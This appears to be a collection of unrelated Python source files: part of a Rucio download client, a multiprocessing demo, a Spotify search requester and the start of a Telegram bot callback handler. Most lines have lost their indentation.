filters = item.get('filters', {})
if filters:
filters = copy.copy(filters)
if dids is None:
self.logger(logging.DEBUG, 'Resolving DIDs by using filter options')
scope = filters.pop('scope')
for did in self.client.list_dids(scope, filters=filters, did_type='all', long=True):
yield did
return
if not isinstance(dids, list):
dids = [dids]
for did_str in dids:
scope, did_name = self._split_did_str(did_str)
filters['name'] = did_name
any_did_resolved = False
for did in self.client.list_dids(scope, filters=filters, did_type='all', long=True):
yield did
any_did_resolved = True
            # Maintain compatibility with existing code, which expects non-existing DIDs to be
            # passed through in order to correctly set the trace state to FILE_NOT_FOUND
if not any_did_resolved and '*' not in did_name:
yield {'scope': scope, 'name': did_name}
def _resolve_and_merge_input_items(self, input_items):
"""
This function takes the input items given to download_dids etc.
and resolves the sources.
- It first performs a list_dids call to dereference any wildcards and
retrieve DID stats (size, length, type).
- Next, input items are grouped together by common list_replicas options.
For each group, a single list_replicas call is performed.
- The resolved File DIDs with sources are finally mapped back to initial
input items to be able to correctly retrieve download options
(timeout, destination directories, etc)
:param input_items: List of dictionaries. Each dictionary describing an input item
:returns: a tuple:
- a dictionary that maps the dereferenced(w/o wildcards) input DIDs to a list of input items
- and a list with a dictionary for each file DID which has to be downloaded
:raises InputValidationError: if one of the input items is in the wrong format
"""
logger = self.logger
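        # Shape of the return value: did_to_input_items maps each dereferenced DID (as a DIDType)
        # to the list of input items that requested it, while merged_items_with_sources is a flat
        # list of file dicts, each carrying its replica 'sources' and the 'input_dids' it came from.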
# check mandatory options before doing any server calls
resolve_archives = False
for item in input_items:
if item.get('resolve_archives') is not None:
logger(logging.WARNING, 'resolve_archives option is deprecated and will be removed in a future release.')
item.setdefault('no_resolve_archives', not item.pop('resolve_archives'))
# If any item needs to resolve archives
if not item.get('no_resolve_archives'):
resolve_archives = True
if not item.get('did'):
if not item.get('filters', {}).get('scope'):
logger(logging.DEBUG, item)
raise InputValidationError('Item without did and filter/scope')
if resolve_archives:
# perhaps we'll need an extraction tool so check what is installed
self.extraction_tools = [tool for tool in self.extraction_tools if tool.is_useable()]
if len(self.extraction_tools) < 1:
logger(logging.WARNING, 'Archive resolution is enabled but no extraction tool is available. '
                                    "Sources whose protocol doesn't support extraction won't be considered for download.")
# if excluding tapes, we need to list them first
tape_rses = []
if self.is_tape_excluded:
try:
tape_rses = [endp['rse'] for endp in self.client.list_rses(rse_expression='istape=true')]
except:
logger(logging.DEBUG, 'No tapes found.')
# Matches each dereferenced DID back to a list of input items
did_to_input_items = {}
# Resolve DIDs
for item in input_items:
resolved_dids = list(self._resolve_one_item_dids(item))
if not resolved_dids:
                logger(logging.WARNING, "An item didn't have any DIDs after resolving the input: %s." % item.get('did', item))
item['dids'] = resolved_dids
for did in resolved_dids:
did_to_input_items.setdefault(DIDType(did), []).append(item)
if 'length' in did and not did['length']:
did_with_size = self.client.get_did(scope=did['scope'], name=did['name'], dynamic=True)
did['length'] = did_with_size['length']
did['bytes'] = did_with_size['bytes']
# group input items by common options to reduce the number of calls to list_replicas
distinct_keys = ['rse', 'force_scheme', 'no_resolve_archives']
item_groups = []
for item in input_items:
found_compatible_group = False
if not item.get('nrandom'):
# Don't merge items if nrandom is set. Otherwise two items with the same nrandom will be merged into one
# and we'll effectively download only half of the desired replicas for each item.
for item_group in item_groups:
if all(item.get(k) == item_group[0].get(k) for k in distinct_keys):
item_group.append(item)
found_compatible_group = True
break
if not found_compatible_group:
item_groups.append([item])
# List replicas for dids
merged_items_with_sources = []
for item_group in item_groups:
# Take configuration from the first item in the group; but dids from all items
item = item_group[0]
input_dids = {DIDType(did): did
for item in item_group
for did in item.get('dids')}
# since we're using metalink we need to explicitly give all schemes
schemes = item.get('force_scheme')
if schemes:
schemes = schemes if isinstance(schemes, list) else [schemes]
logger(logging.DEBUG, 'schemes: %s' % schemes)
# RSE expression, still with tape endpoints included
rse_expression = item.get('rse')
logger(logging.DEBUG, 'rse_expression: %s' % rse_expression)
# obtaining the choice of Implementation
impl = item.get('impl')
if impl:
impl_split = impl.split('.')
if len(impl_split) == 1:
impl = 'rucio.rse.protocols.' + impl + '.Default'
else:
impl = 'rucio.rse.protocols.' + impl
logger(logging.DEBUG, 'impl: %s' % impl)
# get PFNs of files and datasets
logger(logging.DEBUG, 'num DIDs for list_replicas call: %d' % len(item['dids']))
nrandom = item.get('nrandom')
if nrandom:
logger(logging.INFO, 'Selecting %d random replicas from DID(s): %s' % (nrandom, [str(did) for did in input_dids]))
metalink_str = self.client.list_replicas([{'scope': did.scope, 'name': did.name} for did in input_dids],
schemes=schemes,
ignore_availability=False,
rse_expression=rse_expression,
client_location=self.client_location,
resolve_archives=not item.get('no_resolve_archives'),
resolve_parents=True,
nrandom=nrandom,
metalink=True)
file_items = parse_replicas_from_string(metalink_str)
for file in file_items:
if impl:
file['impl'] = impl
elif not item.get('force_scheme'):
file['impl'] = self.preferred_impl(file['sources'])
logger(logging.DEBUG, 'num resolved files: %s' % len(file_items))
if not nrandom or nrandom != len(file_items):
# If list_replicas didn't resolve any file DIDs for any input did, we pass through the input DID.
# This is done to keep compatibility with later code which generates "FILE_NOT_FOUND" traces
# and output items.
# In the special case of nrandom, when serverside filtering is applied, it's "normal" for some input
# dids to be ignored as long as we got exactly nrandom file_items from the server.
for input_did in input_dids:
if not any([input_did == f['did'] or str(input_did) in f['parent_dids'] for f in file_items]):
logger(logging.ERROR, 'DID does not exist: %s' % input_did)
# TODO: store did directly as DIDType object
file_items.append({'did': str(input_did), 'adler32': None, 'md5': None, 'sources': [], 'parent_dids': set(), 'impl': impl or None})
# filtering out tape sources
if self.is_tape_excluded:
for file_item in file_items:
unfiltered_sources = copy.copy(file_item['sources'])
for src in unfiltered_sources:
if src['rse'] in tape_rses:
file_item['sources'].remove(src)
if unfiltered_sources and not file_item['sources']:
logger(logging.WARNING, 'The requested DID {} only has replicas on tape. Direct download from tape is prohibited. '
'Please request a transfer to a non-tape endpoint.'.format(file_item['did']))
# Match the file did back to the dids which were provided to list_replicas.
# Later, this will allow to match the file back to input_items via did_to_input_items
for file_item in file_items:
file_did = DIDType(file_item['did'])
file_input_dids = {DIDType(did) for did in file_item.get('parent_dids', [])}.intersection(input_dids)
if file_did in input_dids:
file_input_dids.add(file_did)
file_item['input_dids'] = {did: input_dids[did] for did in file_input_dids}
merged_items_with_sources.extend(file_items)
return did_to_input_items, merged_items_with_sources
def _options_from_input_items(self, input_items):
"""
Best-effort generation of download options from multiple input items which resolve to the same file DID.
This is done to download each file DID only once, even if it is requested multiple times via overlapping
datasets and/or wildcard resolutions in distinct input items.
        Some options can be merged easily. For example, multiple base_dir values are all collected into a set; as a
        result, the file is downloaded once and copied to all desired destinations.
        Other options are not necessarily compatible, e.g. two items requesting different values for the
        download timeout. We do our best to merge the options in such cases.
"""
options = {}
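        # Illustrative example (hypothetical values): merging an item with transfer_timeout=300 and
        # one with transfer_timeout=600 yields 600 (max), transfer_speed_timeout values are merged
        # with min, and every (base_dir, no_subdir) pair is collected into the 'destinations' set.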
for item in input_items:
base_dir = item.get('base_dir', '.')
no_subdir = item.get('no_subdir', False)
new_transfer_timeout = item.get('transfer_timeout', None)
new_transfer_speed_timeout = item.get('transfer_speed_timeout', None)
options.setdefault('destinations', set()).add((base_dir, no_subdir))
# Merge some options
# The other options of this DID will be inherited from the first item that contained the DID
options['ignore_checksum'] = options.get('ignore_checksum') or item.get('ignore_checksum', False)
options['check_local_with_filesize_only'] = options.get('check_local_with_filesize_only') or item.get('check_local_with_filesize_only', False)
# if one item wants to resolve archives we enable it for all items
options['resolve_archives'] = (options.get('resolve_archives') or not item.get('no_resolve_archives'))
cur_transfer_timeout = options.setdefault('transfer_timeout', None)
if cur_transfer_timeout is not None and new_transfer_timeout is not None:
options['transfer_timeout'] = max(int(cur_transfer_timeout), int(new_transfer_timeout))
elif new_transfer_timeout is not None:
options['transfer_timeout'] = int(new_transfer_timeout)
cur_transfer_speed_timeout = options.setdefault('transfer_speed_timeout', None)
if cur_transfer_speed_timeout is not None and new_transfer_speed_timeout is not None:
options['transfer_speed_timeout'] = min(float(cur_transfer_speed_timeout), float(new_transfer_speed_timeout))
elif new_transfer_speed_timeout is not None:
options['transfer_speed_timeout'] = float(new_transfer_speed_timeout)
return options
def _prepare_items_for_download(self, did_to_input_items, file_items):
"""
        Optimises the number of files to download
(This function is meant to be used as class internal only)
:param did_to_input_items: dictionary that maps resolved input DIDs to input items
:param file_items: list of dictionaries. Each dictionary describes a File DID to download
:returns: list of dictionaries. Each dictionary describes an element to download
:raises InputValidationError: if the given input is not valid or incomplete
"""
logger = self.logger
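        # Strategy sketch: client-extract archives (cea) are tracked in two maps below. An archive
        # is 'pure' if its files have no direct source or the archive source has the highest priority;
        # 'mixed' archives are promoted to 'pure' only when at least use_cea_threshold files need them
        # (or the same archive is already pure). Redundant pure archives are dropped afterwards.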
# maps file item IDs (fiid) to the file item object
fiid_to_file_item = {}
        # cea -> client_extract archives, to avoid confusion with archives that don't need explicit extraction
        # this dict will contain all ids of cea's that will definitely be downloaded
        cea_id_pure_to_fiids = {}
        # this dict will contain ids of cea's that have higher-prioritised non-cea sources
        cea_id_mixed_to_fiids = {}
all_dest_file_paths = set()
# get replicas for every file of the given dids
for file_item in file_items:
file_did = DIDType(file_item['did'])
input_items = list(itertools.chain.from_iterable(did_to_input_items.get(did, []) for did in file_item['input_dids']))
options = self._options_from_input_items(input_items)
file_item['scope'] = file_did.scope
file_item['name'] = file_did.name
logger(logging.DEBUG, 'Queueing file: %s' % file_did)
logger(logging.DEBUG, 'real parents: %s' % [str(did) for did in file_item['input_dids'] if did != file_did])
logger(logging.DEBUG, 'options: %s' % options)
# prepare destinations folders:
dest_file_paths = file_item.get('dest_file_paths', set())
for input_did in file_item['input_dids']:
for item in did_to_input_items[input_did]:
base_dir = item.get('base_dir', '.')
no_subdir = item.get('no_subdir', False)
file_did_path = file_did.name
if input_did != file_did:
# if datasets were given: prepare the destination paths for each dataset
if self.extract_scope_convention == 'belleii' and file_did_path.startswith('/'):
file_did_path = file_did_path.split('/')[-1]
path = os.path.join(self._prepare_dest_dir(base_dir, input_did.name, no_subdir), file_did_path)
else:
# if no datasets were given only prepare the given destination paths
if file_did_path.startswith('/'):
file_did_path = file_did_path[1:]
path = os.path.join(self._prepare_dest_dir(base_dir, file_did.scope, no_subdir), file_did_path)
if path in all_dest_file_paths:
raise RucioException("Multiple file items with same destination file path")
all_dest_file_paths.add(path)
dest_file_paths.add(path)
# workaround: just take any given dataset for the traces and the output
file_item.setdefault('dataset_scope', input_did.scope)
file_item.setdefault('dataset_name', input_did.name)
if not options:
continue
resolve_archives = options.get('resolve_archives')
file_item['merged_options'] = options
file_item['dest_file_paths'] = list(dest_file_paths)
file_item['temp_file_path'] = '%s.part' % file_item['dest_file_paths'][0]
            # the file DID string is not a unique key for this dict because multiple calls of list_replicas
            # could return the same DID multiple times, so we're using the id of the dictionary objects
fiid = id(file_item)
fiid_to_file_item[fiid] = file_item
if resolve_archives:
min_cea_priority = None
num_non_cea_sources = 0
cea_ids = []
sources = []
# go through sources and check how many (non-)cea sources there are,
# index cea sources, or remove cea sources if there is no extraction tool
for source in file_item['sources']:
is_cea = source.get('client_extract', False)
if is_cea and (len(self.extraction_tools) > 0):
priority = int(source['priority'])
if min_cea_priority is None or priority < min_cea_priority:
min_cea_priority = priority
                        # workaround: since we don't have the archive DID, use the part behind the last slash of the PFN
                        # this doesn't respect the scope of the archive DID!!!
                        # and we trust that client_extract==True sources don't have any parameters at the end of the PFN
cea_id = source['pfn'].split('/')
cea_id = cea_id[-1] if len(cea_id[-1]) > 0 else cea_id[-2]
cea_ids.append(cea_id)
sources.append(source)
elif not is_cea:
num_non_cea_sources += 1
sources.append(source)
else:
# no extraction tool
logger(logging.DEBUG, 'client_extract=True; ignoring source: %s' % source['pfn'])
logger(logging.DEBUG, 'Prepared sources: num_sources=%d/%d; num_non_cea_sources=%d; num_cea_ids=%d'
% (len(sources), len(file_item['sources']), num_non_cea_sources, len(cea_ids)))
file_item['sources'] = sources
# if there are no cea sources we are done for this item
if min_cea_priority is None:
continue
# decide if file item belongs to the pure or mixed map
# if no non-archive src exists or the highest prio src is an archive src we put it in the pure map
elif num_non_cea_sources == 0 or min_cea_priority == 1:
logger(logging.DEBUG, 'Adding fiid to cea pure map: '
'num_non_cea_sources=%d; min_cea_priority=%d; num_cea_sources=%d'
% (num_non_cea_sources, min_cea_priority, len(cea_ids)))
for cea_id in cea_ids:
cea_id_pure_to_fiids.setdefault(cea_id, set()).add(fiid)
file_item.setdefault('cea_ids_pure', set()).add(cea_id)
# if there are non-archive sources and archive sources we put it in the mixed map
elif len(cea_ids) > 0:
logger(logging.DEBUG, 'Adding fiid to cea mixed map: '
'num_non_cea_sources=%d; min_cea_priority=%d; num_cea_sources=%d'
% (num_non_cea_sources, min_cea_priority, len(cea_ids)))
for cea_id in cea_ids:
cea_id_mixed_to_fiids.setdefault(cea_id, set()).add(fiid)
file_item.setdefault('cea_ids_mixed', set()).add(cea_id)
# put all archives from the mixed list into the pure list if they meet
# certain conditions, e.g., an archive that is already in the pure list
for cea_id_mixed in list(cea_id_mixed_to_fiids.keys()):
fiids_mixed = cea_id_mixed_to_fiids[cea_id_mixed]
if cea_id_mixed in cea_id_pure_to_fiids:
# file from mixed list is already in a pure list
logger(logging.DEBUG, 'Mixed ID is already in cea pure map: '
'cea_id_mixed=%s; num_fiids_mixed=%d; num_cea_pure_fiids=%d'
% (cea_id_mixed, len(fiids_mixed), len(cea_id_pure_to_fiids[cea_id_mixed])))
elif len(fiids_mixed) >= self.use_cea_threshold:
# more than use_cea_threshold files are in a common archive
logger(logging.DEBUG, 'Number of needed files in cea reached threshold: '
'cea_id_mixed=%s; num_fiids_mixed=%d; threshold=%d'
% (cea_id_mixed, len(fiids_mixed), self.use_cea_threshold))
else:
                # don't move from mixed list to pure list
continue
# first add cea_id to pure map so it can be removed from mixed map later
cea_id_pure_to_fiids.setdefault(cea_id_mixed, set()).update(fiids_mixed)
# now update all file_item mixed/pure maps
for fiid_mixed in list(fiids_mixed):
file_item = fiid_to_file_item[fiid_mixed]
# add cea id to file_item pure map
file_item.setdefault('cea_ids_pure', set()).add(cea_id_mixed)
# remove file item mixed map and
# remove references from all other mixed archives to file_item
for cea_id_mixed2 in file_item.pop('cea_ids_mixed'):
cea_id_mixed_to_fiids[cea_id_mixed2].remove(fiid_mixed)
# finally remove cea_id from mixed map
cea_id_mixed_to_fiids.pop(cea_id_mixed)
for file_item in file_items:
cea_ids_pure = file_item.get('cea_ids_pure', set())
cea_ids_mixed = file_item.get('cea_ids_mixed', set())
if len(cea_ids_pure) > 0:
logger(logging.DEBUG, 'Removing all non-cea sources of file %s' % file_item['did'])
file_item['sources'] = [s for s in file_item['sources'] if s.get('client_extract', False)]
elif len(cea_ids_mixed) > 0:
logger(logging.DEBUG, 'Removing all cea sources of file %s' % file_item['did'])
file_item['sources'] = [s for s in file_item['sources'] if not s.get('client_extract', False)]
# reduce the amount of archives to download by removing
# all redundant pure archives (=all files can be extracted from other archives)
for cea_id_pure in list(cea_id_pure_to_fiids.keys()):
# if all files of this archive are available in more than one archive the archive is redundant
if all(len(fiid_to_file_item[fiid_pure]['cea_ids_pure']) > 1 for fiid_pure in cea_id_pure_to_fiids[cea_id_pure]):
for fiid_pure in cea_id_pure_to_fiids[cea_id_pure]:
fiid_to_file_item[fiid_pure]['cea_ids_pure'].discard(cea_id_pure)
logger(logging.DEBUG, 'Removing redundant archive %s' % cea_id_pure)
cea_id_pure_to_fiids.pop(cea_id_pure)
# remove all archives of a file except a single one so
# that each file is assigned to exactly one pure archive
for cea_id_pure in cea_id_pure_to_fiids:
for fiid_pure in cea_id_pure_to_fiids[cea_id_pure]:
cea_ids_pure = fiid_to_file_item[fiid_pure]['cea_ids_pure']
for cea_id_pure_other in list(cea_ids_pure):
if cea_id_pure != cea_id_pure_other:
cea_id_pure_to_fiids[cea_id_pure_other].discard(fiid_pure)
cea_ids_pure.discard(cea_id_pure_other)
download_packs = []
cea_id_to_pack = {}
for file_item in file_items:
cea_ids = file_item.get('cea_ids_pure', set())
if len(cea_ids) > 0:
cea_id = next(iter(cea_ids))
pack = cea_id_to_pack.get(cea_id)
if pack is None:
scope = file_item['scope']
first_dest = next(iter(file_item['merged_options']['destinations']))
dest_path = os.path.join(self._prepare_dest_dir(first_dest[0], scope, first_dest[1]), cea_id)
pack = {'scope': scope,
'name': cea_id,
'dest_file_paths': [dest_path],
'temp_file_path': '%s.part' % dest_path,
'sources': file_item['sources'],
                            'merged_options': {'ignore_checksum': True},  # we currently don't have checksums for the archive
'archive_items': []
}
cea_id_to_pack[cea_id] = pack
download_packs.append(pack)
file_item.pop('sources')
pack['archive_items'].append(file_item)
else:
download_packs.append(file_item)
return download_packs
def _split_did_str(self, did_str):
"""
Splits a given DID string (e.g. 'scope1:name.file') into its scope and name part
(This function is meant to be used as class internal only)
        :param did_str: the DID string that will be split
        :returns: the scope and name parts of the given DID
:raises InputValidationError: if the given DID string is not valid
"""
did = did_str.split(':')
if len(did) == 2:
did_scope = did[0]
did_name = did[1]
elif len(did) == 1:
if self.extract_scope_convention == 'belleii':
scopes = [scope for scope in self.client.list_scopes()]
did_scope, did_name = extract_scope(did[0], scopes)
else:
did = did_str.split('.')
did_scope = did[0]
if did_scope == 'user' or did_scope == 'group':
did_scope = '%s.%s' % (did[0], did[1])
did_name = did_str
else:
            raise InputValidationError('%s is not a valid DID. Too many colons.' % did_str)
if did_name.endswith('/'):
did_name = did_name[:-1]
return did_scope, did_name
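    # _split_did_str examples: 'scope1:name.file' -> ('scope1', 'name.file'); without a colon,
    # a name such as 'user.jdoe.test.file' resolves to scope 'user.jdoe' and keeps the full
    # string as the name (a trailing slash is stripped from the name).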
def _prepare_dest_dir(self, base_dir, dest_dir_name, no_subdir):
"""
        Builds the final destination path for a file and creates the
        destination directory if it does not exist.
(This function is meant to be used as class internal only)
:param base_dir: base directory part
:param dest_dir_name: name of the destination directory
:param no_subdir: if no subdirectory should be created
        :returns: the absolute path of the destination directory
"""
# append dest_dir_name, if subdir should be used
if dest_dir_name.startswith('/'):
dest_dir_name = dest_dir_name[1:]
dest_dir_path = os.path.join(os.path.abspath(base_dir), '' if no_subdir else dest_dir_name)
if not os.path.isdir(dest_dir_path):
os.makedirs(dest_dir_path)
return dest_dir_path
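    # Hypothetical _prepare_dest_dir example: base_dir='downloads', dest_dir_name='user.jdoe',
    # no_subdir=False returns '<abs path of downloads>/user.jdoe' (creating it if missing);
    # with no_subdir=True the absolute base directory itself is returned.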
def _check_output(self, output_items, deactivate_file_download_exceptions=False):
"""
Checks if all files were successfully downloaded
(This function is meant to be used as class internal only)
:param output_items: list of dictionaries describing the downloaded files
:param deactivate_file_download_exceptions: Boolean, if file download exceptions shouldn't be raised
:returns: output_items list
:raises NoFilesDownloaded:
:raises NotAllFilesDownloaded:
"""
success_states = ['ALREADY_DONE', 'DONE', 'FOUND_IN_PCACHE']
# failure_states = ['FILE_NOT_FOUND', 'FAIL_VALIDATE', 'FAILED']
num_successful = 0
num_failed = 0
for item in output_items:
clientState = item.get('clientState', 'FAILED')
if clientState in success_states:
num_successful += 1
else:
num_failed += 1
if not deactivate_file_download_exceptions and num_successful == 0:
raise NoFilesDownloaded()
elif not deactivate_file_download_exceptions and num_failed > 0:
raise NotAllFilesDownloaded()
return output_items
def _send_trace(self, trace):
"""
        Checks if sending the trace is allowed and sends the trace.
:param trace: the trace
"""
if self.tracing:
send_trace(trace, self.client.trace_host, self.client.user_agent)
def preferred_impl(self, sources):
"""
Finds the optimum protocol impl preferred by the client and
supported by the remote RSE.
:param sources: List of sources for a given DID
:raises RucioException(msg): general exception with msg for more details.
"""
preferred_protocols = []
checked_rses = []
supported_impl = None
try:
preferred_impls = config_get('download', 'preferred_impl')
except Exception as error:
self.logger(logging.INFO, 'No preferred protocol impl in rucio.cfg: %s' % (error))
return supported_impl
else:
preferred_impls = list(preferred_impls.split(', '))
i = 0
while i < len(preferred_impls):
impl = preferred_impls[i]
impl_split = impl.split('.')
if len(impl_split) == 1:
preferred_impls[i] = 'rucio.rse.protocols.' + impl + '.Default'
else:
preferred_impls[i] = 'rucio.rse.protocols.' + impl
i += 1
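        # e.g. a rucio.cfg entry of 'preferred_impl = xrootd, gfal.Default' (hypothetical value)
        # expands to ['rucio.rse.protocols.xrootd.Default', 'rucio.rse.protocols.gfal.Default']
        # before being matched against each RSE's protocol list below.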
for source in sources:
if source['rse'] in checked_rses:
continue
try:
rse_settings = rsemgr.get_rse_info(source['rse'], vo=self.client.vo)
checked_rses.append(str(source['rse']))
except RucioException as error:
                self.logger(logging.DEBUG, 'Could not get info of RSE %s: %s' % (source['rse'], error))
continue
preferred_protocols = [protocol for protocol in reversed(rse_settings['protocols']) if protocol['impl'] in preferred_impls]
if len(preferred_protocols) == 0:
continue
for protocol in preferred_protocols:
if not protocol['domains']['wan'].get("read"):
self.logger(logging.WARNING, 'Unsuitable protocol "%s": "WAN Read" operation is not supported' % (protocol['impl']))
continue
try:
supported_protocol = rsemgr.create_protocol(rse_settings, 'read', impl=protocol['impl'], auth_token=self.auth_token, logger=self.logger)
supported_protocol.connect()
except Exception as error:
self.logger(logging.WARNING, 'Failed to create protocol "%s", exception: %s' % (protocol['impl'], error))
pass
else:
self.logger(logging.INFO, 'Preferred protocol impl supported locally and remotely: %s' % (protocol['impl']))
supported_impl = protocol['impl']
break
return supported_impl
def _verify_checksum(item, path):
rucio_checksum = item.get(PREFERRED_CHECKSUM)
local_checksum = None
checksum_algo = CHECKSUM_ALGO_DICT.get(PREFERRED_CHECKSUM)
if rucio_checksum and checksum_algo:
local_checksum = checksum_algo(path)
return rucio_checksum == local_checksum, rucio_checksum, local_checksum
for checksum_name in GLOBALLY_SUPPORTED_CHECKSUMS:
rucio_checksum = item.get(checksum_name)
checksum_algo = CHECKSUM_ALGO_DICT.get(checksum_name)
if rucio_checksum and checksum_algo:
local_checksum = checksum_algo(path)
return rucio_checksum == local_checksum, rucio_checksum, local_checksum
return False, None, None
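# Example of how _verify_checksum behaves (assuming PREFERRED_CHECKSUM is 'adler32'): for a
# hypothetical item = {'adler32': '01234567'} it computes the adler32 of the local file and returns
# the tuple (matches, rucio_checksum, local_checksum); if no supported checksum is present it
# returns (False, None, None).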
|
ProcessDemo.py
|
import os
from multiprocessing import Process
def create_thread_for_windows(name):
print('child process %s (%s) Running...' % (name, os.getpid()))
def create_thread_for_unix():
    pid = os.fork()  # for Unix and Linux systems only (os.fork is not available on Windows)
if pid < 0:
print('error fork')
elif pid == 0:
        print('I am child process (%s) and my parent process is (%s)' % (os.getpid(), os.getppid()))
else:
        print('I (%s) created a child process (%s).' % (os.getpid(), pid))
if __name__ == '__main__':
print('current process (%s) start ...' % (os.getpid()))
# create_thread_for_unix()
for i in range(5):
p = Process(target=create_thread_for_windows, args=(str(i),))
print('Process will start.')
p.start()
p.join()
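        # Note: join() inside the loop waits for each child to finish before the next one starts,
        # so these five worker processes run sequentially rather than in parallel.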
print('Process end...')
|
requester.py
|
import base64
import json
import os
from threading import Thread
from time import sleep
import dpath
import requests
from requests import RequestException
from spotify_my_words.exceptions import GeneralError
SPOTIFY_TOKEN_URL = 'https://accounts.spotify.com/api/token'
SPOTIFY_SEARCH_URL = 'https://api.spotify.com/v1/search'
HTTP_SUCCESS = 200
TIMEOUT_ERROR = 429
def request_from_spotify(cleaned, total_items):
# Yes using global is completely disgusting and wrong, but in the interests of this short
# exercise, turning the whole thing into a class might be a bit overkill. Don't hate me.
    # This is a simple list so that multiple threads have somewhere to write to at a specific
    # index to maintain order.
global playlist
playlist = ['' for _ in range(total_items)]
headers = {'Authorization': f'Bearer {_get_token()}'}
threads = []
for token, metadata in cleaned.items():
request_params = {
'q': f'{token}',
'type': 'track',
'offset': 0,
'limit': 1,
}
thread = Thread(
target=_parse_track_metadata, args=(headers, request_params, metadata, token))
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
return json.dumps(playlist)
def _get_token():
headers = {'Authorization': f'Basic {_encode_secrets()}'}
body = {'grant_type': 'client_credentials'}
try:
token_response = _post_to_spotify(SPOTIFY_TOKEN_URL, headers, body)
except GeneralError:
raise
else:
return json.loads(token_response.text).get('access_token')
def _encode_secrets():
client_id = os.environ.get('CLIENT_ID')
client_secret = os.environ.get('CLIENT_SECRET')
return base64.b64encode(bytes(f'{client_id}:{client_secret}', encoding='utf-8')).decode('utf-8')
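# The two helpers above implement Spotify's client-credentials flow: the client id/secret pair is
# base64-encoded into a Basic Authorization header and exchanged at the token endpoint for a
# bearer access token that authorises the search requests.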
def _parse_track_metadata(track_header, request_params, metadata, token):
names = []
artists = []
while len(names) < metadata.get('limit'):
try:
name, artist = _get_track_metadata(SPOTIFY_SEARCH_URL, track_header, request_params)
except TimeoutError as err:
time_out, *_ = err.args
sleep(time_out)
else:
request_params['offset'] += 1
if name.lower().startswith(token) and name not in names:
names.append(name)
artists.append(artist)
for this_index, full_index in enumerate(metadata.get('indices')):
track_details = f'{names[this_index]} - {artists[this_index]}'
playlist[full_index] = track_details
return True
def _get_track_metadata(url, track_header, request_params):
try:
response = json.loads(_get_from_spotify(url, track_header, request_params).text)
except (GeneralError, TimeoutError):
raise
else:
items = response.get('tracks').get('items')
name = dpath.get(items, '*/name')
artists = dpath.values(items, '*/artists/*/name')
artists = ', '.join(artists) if len(artists) > 1 else str(next(iter(artists)))
return name, artists
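# dpath is used to pull fields out of the nested search response: '*/name' fetches the track name
# of the single returned item (limit=1 in the request params) and '*/artists/*/name' collects all
# artist names on that track, which are then joined into one display string.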
def _post_to_spotify(url, headers, data):
try:
response = requests.post(url, headers=headers, data=data, verify=True)
if response.status_code != HTTP_SUCCESS:
raise RequestException
except RequestException as exc:
raise GeneralError(f'Unable to send information to API: {exc}')
else:
return response
def _get_from_spotify(url, headers, params):
try:
response = requests.get(url, headers=headers, params=params, verify=True)
if response.status_code == TIMEOUT_ERROR:
            sleep_time = int(response.headers.get('Retry-After'))
raise TimeoutError(sleep_time)
if response.status_code != HTTP_SUCCESS:
raise RequestException
except RequestException as exc:
raise GeneralError(f'Unable to get information from API: {exc}')
else:
return response
|
callback.py
|
from utlis.rank import setrank,isrank,remrank,remsudos,setsudo,GPranks,IDrank
from utlis.send import send_msg, BYusers, Sendto, fwdto,Name,Glang,getAge
from utlis.locks import st,getOR,Clang,st_res
from utlis.tg import Bot
from config import *
from pyrogram.types import ReplyKeyboardMarkup, InlineKeyboardMarkup, InlineKeyboardButton
import threading, requests, time, random, re, json,datetime,os
import importlib
from os import listdir
from os.path import isfile, join
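# updateCallback dispatches inline-keyboard callback queries: callback data that is not valid JSON
# (or that belongs to an inline message) is forwarded to the optional plugin modules under ./files,
# while JSON payloads of the form [action, argument, user_id] are matched against the handlers below.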
def updateCallback(client, callback_query,redis):
try:
json.loads(callback_query.data)
except Exception as e:
if redis.smembers("{}Nbot:botfiles".format(BOT_ID)):
onlyfiles = [f for f in listdir("files") if isfile(join("files", f))]
filesR = redis.smembers("{}Nbot:botfiles".format(BOT_ID))
for f in onlyfiles:
if f in filesR:
fi = f.replace(".py","")
UpMs= "files."+fi
try:
U = importlib.import_module(UpMs)
t = threading.Thread(target=U.updateCb,args=(client, callback_query,redis))
t.setDaemon(True)
t.start()
importlib.reload(U)
except Exception as e:
pass
return False
if callback_query.inline_message_id:
if redis.smembers("{}Nbot:botfiles".format(BOT_ID)):
onlyfiles = [f for f in listdir("files") if isfile(join("files", f))]
filesR = redis.smembers("{}Nbot:botfiles".format(BOT_ID))
for f in onlyfiles:
if f in filesR:
fi = f.replace(".py","")
UpMs= "files."+fi
try:
U = importlib.import_module(UpMs)
t = threading.Thread(target=U.updateCb,args=(client, callback_query,redis))
t.setDaemon(True)
t.start()
importlib.reload(U)
except Exception as e:
pass
return False
userID = callback_query.from_user.id
chatID = callback_query.message.chat.id
userFN = callback_query.from_user.first_name
title = callback_query.message.chat.title
message_id = callback_query.message.message_id
date = json.loads(callback_query.data)
group = redis.sismember("{}Nbot:groups".format(BOT_ID),chatID)
c = importlib.import_module("lang.arcmd")
r = importlib.import_module("lang.arreply")
if date[0] == "Cordertow":
rank = isrank(redis,userID,chatID)
        if rank in ("sudo", "asudo", "sudos", "malk", "acreator", "creator", "owner"):
if redis.sismember("{}Nbot:{}:bans".format(BOT_ID,chatID),date[1]):
GetGprank = GPranks(date[1],chatID)
if GetGprank == "kicked":
Bot("unbanChatMember",{"chat_id":chatID,"user_id":date[1]})
redis.srem("{}Nbot:{}:bans".format(BOT_ID,chatID),date[1])
Bot("editMessageText",{"chat_id":chatID,"text":r.doneCO,"message_id":message_id,"disable_web_page_preview":True})
else:
Bot("editMessageText",{"chat_id":chatID,"text":r.ARdoneCO,"message_id":message_id,"disable_web_page_preview":True})
return False
if date[0] == "delBL":
Hash = date[1]
chat = date[3]
if redis.sismember("{}Nbot:groups".format(BOT_ID),chat):
redis.delete("{}Nbot:{}:{}".format(BOT_ID,chat,Hash))
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True})
if re.search("del(.*)replys$",date[0]):
if int(date[2]) != userID:
Bot("answerCallbackQuery",{"callback_query_id":callback_query.id,"text":r.notforyou,"show_alert":True})
return 0
t = date[0].replace("del","")
if date[1] != "kb":
redis.delete("{}Nbot:{}:{}".format(BOT_ID,date[1],t))
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
redis.delete("{}Nbot:{}:{}".format(BOT_ID,chatID,t))
